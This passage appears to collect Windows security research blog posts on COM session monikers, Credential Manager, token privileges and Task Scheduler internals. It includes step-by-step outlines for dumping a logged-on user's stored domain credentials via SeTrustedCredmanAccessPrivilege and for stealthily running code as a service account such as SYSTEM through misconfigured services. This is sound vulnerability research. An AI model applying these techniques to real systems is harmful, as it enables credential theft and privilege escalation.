  HRESULT hr = FindLUAMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  if (hr == MK_E_UNAVAILABLE) {
    hr = FindSessionMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  }
  // Parse rest of moniker.
}

Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName, 
                           ULONG *pchEaten, LPMONIKER *ppmk) {
  DWORD dwSessionId = 0;
  BOOL bConsole = FALSE;
  
  if (wcsnicmp(pszDisplayName, L"Session:", 8))
    return MK_E_UNAVAILABLE;
  
  
if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
    dwConsole = TRUE;
    *pcbEaten = 15;
  } else {
    LPWSTR EndPtr;
    dwSessionId = wcstoul(pszDisplayName + 8, &End, 0);
    *pcbEaten = EndPtr - pszDisplayName;
  }

  *ppmk = new CSessionMoniker(dwSessionId, bConsole);
  return S_OK;
}

This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation, instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:

Session:3!clsid:0002DF02-0000-0000-C000-000000000046

The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.

HRESULT CClassMoniker::BindToObject(LPBC pbc, 
  LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
  if (pmkToLeft) {
      IClassActivator pClassActivator;
      pmkToLeft->BindToObject(pcb, nullptr, 
        IID_IClassActivator, &pClassActivator);
      return pClassActivator->GetClassObject(m_clsid, 
            CLSCTX_SERVER, 0, riid, ppv);

  }
  // ...
}

The pmkToLeft parameter is set by the composite moniker to the left moniker, which is the session moniker. We can see that the class moniker calls the session moniker's BindToObject method requesting an IClassActivator interface. It then calls the GetClassObject method, passing it the CLSID to activate. We're almost there.

HRESULT CSessionMoniker::GetClassObject(
   REFCLSID pClassID, CLSCTX dwClsContext, 
   LCID locale, REFIID riid, void **ppv) {
  IStandardActivator* pActivator;
  CoCreateInstance(&CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, 
    IID_IStandardActivator, &pActivator);

 
  ISpecialSystemProperties pSpecialProperties;
  pActivator->QueryInterface(IID_ISpecialSystemProperties, 
      &pSpecialProperties);
  pSpecialProperties->SetSessionId(m_sessionid, m_console, TRUE);
  return pActivator->StandardGetClassObject(pClassId, dwClsContext, 
                                            NULL, riid, ppv);

}

Finally the session moniker creates a new COM activator object with the IStandardActivator interface. It then queries for the ISpecialSystemProperties interface and sets the moniker's session ID and console state. It then calls the StandardGetClassObject method on the IStandardActivator and you should now have a COM server cross-session. None of these interface or the class are officially documented of course (AFAIK).

The $1000 question is, can you also do IStorage activation through the IStandardActivator interface? Poking around in COMBASE for the implementation of the interface you find one of its functions is:

HRESULT StandardGetInstanceFromIStorage(COSERVERINFO* pServerInfo, 
  REFCLSID pclsidOverride, IUnknown* punkOuter, CLSCTX dwClsCtx, 
  IStorage* pstg, int dwCount, MULTI_QI pResults[]);

It seems that the answer is yes. Of course it's possible that you still can't mix the two things up. That's why I wrote a quick and dirty example in C#, which is available here. Seems to work fine. Of course I've not tested it out with the actual vulnerability to see it works in that scenario. That's something for others to do.

Dumping Stored Credentials with SeTrustedCredmanAccessPrivilege

I've been going through the various token privileges on Windows trying to find where they're used. One which looked interesting is SeTrustedCredmanAccessPrivilege which is documented as "Access Credential Manager as a trusted caller". The Credential Manager allows a user to store credentials, such as web or domain accounts in a central location that only they can access. It's protected using DPAPI so in theory it's only accessible when the user has authenticated to the system. The question is, what does having SeTrustedCredmanAccessPrivilege grant? I couldn't immediately find anyone who'd bothered to document it, so I guess I'll have to do it myself.

The Credential Manager is one of those features that probably sounded great in the design stage, but does introduce security risks, especially if it's used to store privileged domain credentials, such as for remote desktop access. An application, such as the remote desktop client, can store domain credential using the CredWrite API and specifying the username and password in the CREDENTIAL structure. The type of credentials should be set to CRED_TYPE_DOMAIN_PASSWORD.

An application can then access the stored credentials for the current user using APIs such as CredRead or CredEnumerate. However, if the type of credential is CRED_TYPE_DOMAIN_PASSWORD the CredentialBlob field which should contain the password is always empty. This is an artificial restriction put in place by LSASS which implements the credential manager RPC service. If a domain credentials type is being read then it will never return the password.

How does the domain credentials get used if you can't read the password? Security packages such as NTLM/Kerberos/TSSSP which are running within the LSASS process can use an internal API which doesn't restrict the reading of the domain password. Therefore, when you authenticate to the remote desktop service the target name is used to lookup available credentials, if they exist the user will be automatically authenticated.

The credentials are stored in files in the user's profile encrypted with the user's DPAPI key. Why can we not just decrypt the file directly to get the password? When writing the file LSASS sets a system flag in the encrypted blob which makes the DPAPI refuse to decrypt the blob even though it's still under a user's key. Only code running in LSASS can call the DPAPI to decrypt the blob.

If we have administrator privileges getting access the password is trivial. Read the Mimikatz wiki page to understand the various ways that you can use the tool to get access to the credentials. However, it boils down to one of the following approaches:

  1. Patch out the checks in LSASS to not blank the password when read from a normal user.
  2. Inject code into LSASS to decrypt the file or read the credentials.
  3. Just read them from LSASS's memory.
  4. Reimplement DPAPI with knowledge of the user's password to ignore the system flag.
  5. Play games with the domain key backup protocol.
For example, Nirsoft's CredentialsFileView seems to use the injection into LSASS technique to decrypt the DPAPI protected credential files. (Caveat, I've only looked at v1.07 as v1.10 seems to not be available for download anymore, so maybe it's now different. UPDATE: it seems available for download again but Defender thinks it's malware, plus ça change).

At this point you can probably guess that SeTrustedCredmanAccessPrivilege allows a caller to get access to a user's credentials. But how exactly? Looking at LSASRV.DLL which contains the implementation of the Credential Manager the privilege is checked in the function CredpIsRpcClientTrusted. This is only called by two APIs, CredrReadByTokenHandle and CredrBackupCredentials which are exported through the CredReadByTokenHandle and CredBackupCredentials APIs.

The CredReadByTokenHandle API isn't that interesting, it's basically CredRead but allows the user to read from to be specified by providing the user's token. As far as I can tell reading a domain credential still returns a blank password. CredBackupCredentials on the other hand is interesting. It's the API used by CREDWIZ.EXE to backup a user's credentials, which can then be restored at a later time. This backup includes all credentials including domain credentials. The prototype for the API is as follows:

BOOL WINAPI CredBackupCredentials(HANDLE Token, 
                                  LPCWSTR Path, 
                                  PVOID Password, 
                                  DWORD PasswordSize, 
                                  DWORD Flags);

The backup process is slightly convoluted, first you run CREDWIZ on your desktop and select backup and specify the file you want to write the backup to. When you continue with the backup the process makes an RPC call to your WinLogon process with the credentials path which spawns a new copy of CREDWIZ on the secure desktop. At this point you're instructed to use CTRL+ALT+DEL to switch to the secure desktop. Here you type the password, which is used to encrypt the file to protect it at rest, and is needed when the credentials are restored. CREDWIZ will even ensure it meets your system's password policy for complexity, how generous.

CREDWIZ first stores the file to a temporary file, as LSASS encrypts the encrypted contents with the system DPAPI key. The file can be decrypted then written to the final destination, with appropriate impersonation etc.

The only requirement for calling this API is having the SeTrustedCredmanAccessPrivilege privilege enabled. Assuming we're an administrator getting this privilege is easy as we can just borrow a token from another process. For example, checking for what processes have the privilege shows obviously WinLogon but also LSASS itself even though it arguably doesn't need it.

PS> $ts = Get-AccessibleToken
PS> $ts | ? { 
   "SeTrustedCredmanAccessPrivilege" -in $_.ProcessTokenInfo.Privileges.Name 
}
TokenId Access                                  Name
------- ------                                  ----
1A41253 GenericExecute|GenericRead    LsaIso.exe:124
1A41253 GenericExecute|GenericRead     lsass.exe:672
1A41253 GenericExecute|GenericRead winlogon.exe:1052
1A41253 GenericExecute|GenericRead atieclxx.exe:4364

I've literally no idea what the ATIECLXX.EXE process is doing with SeTrustedCredmanAccessPrivilege, it's probably best not to ask ;-)

To use this API to backup a user's credentials as an administrator you do the following. 
  1. Open a WinLogon process for PROCESS_QUERY_LIMITED_INFORMATION access and get a handle to its token with TOKEN_DUPLICATE access.
  2. Duplicate token into an impersonation token, then enable SeTrustedCredmanAccessPrivilege.
  3. Open a token to the target user, who must already be authenticated.
  4. Call CredBackupCredentials while impersonating the WinLogon token passing a path to write to and a NULL password to disable the user encryption (just to make life easier). It's CREDWIZ which enforces the password policy not the API.
  5. While still impersonating open the file and decrypt it using the CryptUnprotectData API, write back out the decrypted data.
If it all goes well you'll have all the of the user's credentials in a packed binary format. I couldn't immediately find anyone documenting it, but people obviously have done before. I'll leave doing all this yourself as a exercise for the reader. I don't feel like providing an implementation.


Why would you do this when there already exists plenty of other options? The main advantage, if you can call it that, it you never touch LSASS and definitely never inject any code into it. This wouldn't be possible anyway if LSASS is running as PPL. You also don't need to access the SECURITY hive to extract DPAPI credentials or know the user's password (assuming they're authenticated of course). About the only slightly suspicious thing is opening WinLogon to get a token, though there might be alternative approaches to get a suitable token.



The Much Misunderstood SeRelabelPrivilege

Based on my previous blog post I recently had a conversation with a friend and well-known Windows security researcher about token privileges. Specifically, I was musing on how SeTrustedCredmanAccessPrivilege is not a "God" privilege. After some back and forth it seemed we were talking at cross purposes. My concept of a "God" privilege is one which the kernel considers to make a token elevated (see Reading Your Way Around UAC (Part 3)) and so doesn't make it available to any token with an integrity level less than High. They on the other hand consider such a privilege to be one where you can directly compromise a resource or the OS as a whole by having the privilege enabled, this might include privileges which aren't strictly a "God" from the kernel's perspective but can still allow system compromise.

After realizing the misunderstanding I was still surprised that one of the privileges in their list wasn't considering a "God", specifically SeRelabelPrivilege. It seems that there's perhaps some confusion as to what this privilege actually allows you to do, so I thought it'd be worth clearing it up.

Point of pedantry: I don't believe it's correct to say that a resource has an integrity level. It instead has a mandatory label, which is stored in an ACE in the SACL. That ACE contains a SID which maps to an integrity level and an mandatory policy which is stored in the access mask. The combination of integrity level and policy is what determines what access is granted (although you can't grant write up through the policy). The token on the other hand does have an integrity level and a separate mandatory policy, which isn't the same as the one in the ACE. Oddly you specify the value when calling SetTokenInformation using a TOKEN_MANDATORY_LABEL structure, confusing I know.

As with a lot of privileges which don't get used very often the official documentation is not great. You can find the MSDN documentation here. The page is worse than usual as it seems to have been written at a time in the Vista/Longhorn development when the Mandatory Integrity Control (MIC) (or as it calls it Windows Integrity Control (WIC)) feature was still in flux. For example, it mentions an integrity level above System, called Installer. Presumably Installer was the initial idea to block administrators modifying system files, which was replaced by the TrustedInstaller SID as the owner (see previous blog posts). There is a level above System in Vista, called Protected Process, which is not usable as protected processes was implementing using a different mechanism. 

Distilling what the documentation says the privilege does, it allows for two operations. First it allows you to set the integrity level in a mandatory label ACE to be above the caller's token integrity level. Normally as long as you've been granted WRITE_OWNER access to a resource you can set the label's integrity level to any value less than or equal to the caller's integrity level.

For example, if you try to set the resource's label to System, but the caller is only at High then the operation fails with the STATUS_INVALID_LABEL error. If you enable SeRelabelPrivilege then you can set this operation will succeed. 

Note, the privilege doesn't allow you to raise the integrity level of a token, you need SeTcbPrivilege for that. You can't even raise the integrity level to be less than or equal to the caller's integrity level, the operation can only decrease the level in the token without SeTcbPrivilege.

The second operation is that you can decrease the label. In general you can always decrease the label without the privilege, unless the resource's label is above the callers. For example you can set the label to Low without any special privilege, as long as you have WRITE_OWNER access on the handle and the current label is less than or equal to the caller's. However, if the label is System and the caller is High then they can't decrease the label and the privilege is required.

The documentation has this to say (emphasis mine):

"If malicious software is set with an elevated integrity level such as Trusted Installer or System, administrator accounts do not have sufficient integrity levels to delete the program from the system. In that case, use of the Modify an object label right is mandated so that the object can be relabeled. However, the relabeling must occur by using a process that is at the same or a higher level of integrity than the object that you are attempting to relabel."

This is a very confused paragraph. First it indicates that an administrator can't delete resource with Trusted Installer or System integrity labels and so requires the privilege to relabel. And then it says that the process doing the relabeling must be at a greater or equal integrity level to do the relabeling. Which if that is the case you don't need the privilege. Perhaps the original design on mandatory labels was more sticky, as in maybe you always needed SeRelabelPrivilege to reduce the label regardless of its current value?

At any rate the only user that gets SeRelabelPrivilege by default is SYSTEM, which defaults to the System integrity level which is already the maximum allowed level so this behavior of the privilege seems pretty much moot. At any rate as it's a "God" privilege it will be disabled if the token has an integrity level less than High, so this lowering operation is going to be rarely useful.

This leads in to the most misunderstood part which if you squint you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level regardless of the DACL or whether they're the owner. 

This is the interesting thing the privilege brings to the lowering operation, it allows the caller to circumvent the MIC check for WRITE_OWNER. This then allows the caller to open for WRITE_OWNER a higher labeled resource and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it'll still be subject to the MIC check and will not grant access if the label is above the caller's integrity level.

The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

Surely, there is some limitation on what type of resource can be granted WRITE_OWNER access? Nope, it seems that even if the caller does not have any access rights to the resource it will still be granted WRITE_OWNER access. This makes the SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege but with the adding feature of circumventing the MIC check. Summarizing, a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller.

You can of course verify this yourself, here's some PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege.

PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
PS> Invoke-NtToken -System {
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status               Granted Access Privileges
------               -------------- ----------
STATUS_ACCESS_DENIED 0              NONE

PS> Invoke-NtToken -System {
   Enable-NtTokenPrivilege SeRelabelPrivilege
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status         Granted Access Privileges
------         -------------- ----------
STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

The fact that this behavior is never made explicit is probably why my friend didn't realize its behavior before. This coupled with the privilege's rare usage, only being granted by default to SYSTEM means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created, it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process. 

If you've read this far is there any actual useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check using SeDebugPrivilege. Of course usage of that privilege is probably watched like a hawk, so you could abuse this privilege to get full access to an elevated process, by accessing changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly without SeDebugPrivilege.

However, as only SYSTEM gets the privilege by default you'd need to impersonate the token, which would probably just allow you to access the process anyway. So mostly it's mostly a useless quirk unless the system you're looking at has granted it to the service accounts which might then open the door slightly to escaping to SYSTEM.

A Little More on the Task Scheduler's Service Account Usage

Recently I was playing around with a service which was running under a full virtual service account rather than LOCAL SERVICE or NETWORK SERVICE, but it had SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One thing which was interesting is that he mentioned that a technique abusing the task scheduler found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate it further, out of curiosity, and in the process I found an sneaky technique you can use for other purposes.

I've already blogged about the task scheduler's use of service accounts. Specifically in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID is the same name as used when you are using a virtual service account it's clear that the problem lies in the way in this functionality is implemented and that it's likely distinct from how LS or NS token's are created.

The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. A quick look at that DLL we find the following code:

HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {

  // ...

  if (UbpmUtilsIsServiceSid(PrinicpalSid)) {

    return UbpmpTokenGetServiceAccountToken(PrinicpalSid);

  }

  if (EqualSid(PrinicpalSid, kNetworkService)) {

    Domain = L"NT AUTHORITY";

    User = L"NetworkService";

  } else if (EqualSid(PrinicpalSid, kLocalService)) {

    Domain = L"NT AUTHORITY";

    User = L"LocalService";

  }

  HANDLE Token;

  if (LogonUserExExW(User, Domain, Password, 

    LOGON32_LOGON_SERVICE, 

    LOGON32_PROVIDER_DEFAULT, &Token)) {

    return Token;

  }

  // ...

}


This UbpmpTokenGetNonInteractiveToken function is taking the principal SID from the task registration or passed to RunEx and determining what it represents to get back the token. It checks if the SID is a service SID, by which is means the NT SERVICE\NAME SID we used in the previous blog post. If it is it calls a separate function, UbpmpTokenGetServiceAccountToken to get the service token.

Otherwise if the SID is NS or LS then it specifies the well know names for those SIDs and called LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

TOKEN UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {

  LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);

  SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

  SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

  HANDLE Token;

  GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);

  return Token;

}

This function gets the name from the service SID, which is the name of the service itself and opens it for all access rights (SERVICE_ALL_ACCESS). If that succeeds then it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in SCM this basically uses the exact same code as it would use for creating the token for starting the service. 

This is why there's a distinction between LS/NS and a virtual service account using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from the LSA with no regards to how the service is configured. Therefore the new token has SeImpersonatePrivilege (or what ever else is allowed). However for a virtual service account the service asks the SCM for the service's token, as the SCM knows about what restrictions are in place it honours things like privileges or the SID type. Therefore the returned token will be stripped of SeImpersonatePrivilege again even though it'll technically be a different token to the currently running service.

Why does the task scheduler need some undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts only the SCM (well technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me as you already need SeTcbPrivilege to create the service token, but it is what it is.

Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well one interesting behavior came from looking at how the task scheduler determines if you're allowed to specify a service SID as a principal. In my blog post of creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller's allowed to run a task as a specified principal.

BOOL IsPrincipalAllowed(User& principal) {

  RpcAutoImpersonate::RpcAutoImpersonate();

  User caller;

  User::FromImpersonationToken(&caller);

  RpcRevertToSelf();

  if (tsched::IsUserAdmin(caller) || 

      caller.IsLocalSystem(caller)) {

    return TRUE;

  }

  

  if (principal == caller) {

    return TRUE;

  }


  if (principal.IsServiceSid()) {

    LPCWSTR Name = principal.GetAccount();

    RpcAutoImpersonate::RpcAutoImpersonate();

    SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);

    SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);

    RpcRevertToSelf();

    if (service) {

      return TRUE;

    }

  }

  return FALSE;

}

The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is then any principal is allowed (again not completely true, but good enough). Next it checks if the principal's user SID matches the one we're setting. This is what would allow NS/LS or a virtual service account to specify a task running as their own user account. 


Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 


It's a well known check for privilege escalation that you enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few different reasons.

  1. Changing the executable path could easily be noticed.
  2. You probably want to fix the path back again afterwards, which is just a pain.
  3. If the service is currently running you'll need stop the service, then restart the modified service to get the code execution.
However, as long as your account is granted full access to the service you can use the task scheduler even without being an administrator to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc, but that's something which is easy enough to deal with (as long as it's not write restricted).

This is a good lesson on how to never take things on face value. I just assumed the caller would need administrator privileges to set the service account as the principal for a task. But it seems that's not actually required if you dig into the code. Hopefully someone will find it useful.

Footnote: If you read this far, you might also ask, can you get back SeImpersonatePrivilege from a virtual service account or not? Of course, you just use the named pipe trick I described in a previous blog post. Because of the way that the token is created the token stored in the logon session will still have all the assigned privileges. You can extract the token by using the named pipe to your own service, and use that to create a new process and get back all the missing privileges.






❌